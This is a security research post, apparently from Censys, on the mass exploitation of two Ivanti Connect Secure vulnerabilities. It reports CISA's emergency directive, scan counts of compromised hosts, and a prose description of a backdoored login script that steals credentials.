Cybersecurity

The Mass Exploitation of Ivanti Connect Secure

Compromised Ivanti Connect Secure IPs

Last Friday, CISA issued Emergency Directive 24-01 mandating all Federal Civilian Executive Branch (FCEB) agencies to address two actively exploited vulnerabilities in Ivanti Connect Secure and Ivanti Policy Secure. These vulnerabilities, CVE-2023-46805 (an authentication bypass vulnerability) and CVE-2024-21887 (a command-injection vulnerability), when exploited in combination, allow malicious actors to achieve remote code execution (RCE) on vulnerable servers. All supported versions, including Version 9.x and 22.x, are affected by these vulnerabilities (refer to Ivanti’s version support matrix).

FCEB agencies had until 11:59 EST on Monday, January 22, to implement Ivanti’s recovery steps, run the vendor’s Integrity Checker Tool, and take additional action if signs of compromise were detected.

This directive is no surprise, considering the worldwide mass exploitation observed since Ivanti initially revealed the vulnerabilities on January 10. These vulnerabilities are particularly serious given the severity, widespread exposure of these systems, and the complexity of mitigation – especially given the absence of an official patch from the vendor as of the current writing. Ivanti outlined a plan to release patches on a staggered schedule beginning this week.

Volexity researchers first identified exploitation attempts dating back to December 2023. Subsequent analysis revealed that the initial activity was likely the work of an unidentified threat actor tracked by Volexity as “UTA0178.” A Proof of Concept was published on January 16.

Censys researchers conducted scans to dig deeper into the extent of compromised servers.

Censys Findings

As of Monday, January 22, 2024, Censys observed the following: 

Description Value
Number of Unique Connect Secure Hosts 26,095
Number of Unique Compromised Connect Secure Hosts 412
Percentage of Hosts Compromised 1.5%
Number of Unique Credential Stealing Receivers / Callback URLs 22

In their research, Volexity noted that a legitimate javascript component (/dana-na/auth/lastauthserverused.js),  used to remember the last selected authentication realm, had been found to have been modified by attackers to include various mechanisms to hijack and exfiltrate client login information. This backdoored javascript would send the usernames, passwords, and the URL of the attempted authentication back to an attacker-owned HTTP server.

We conducted a secondary scan on all Ivanti Connect Secure servers in our dataset and found 412 unique hosts with this backdoor. Additionally, we found 22 distinct “variants” (or unique callback methods), which could indicate multiple attackers or a single attacker evolving their tactics.

Censys Search customers can use the following query to identify Ivanti Connect Secure hosts.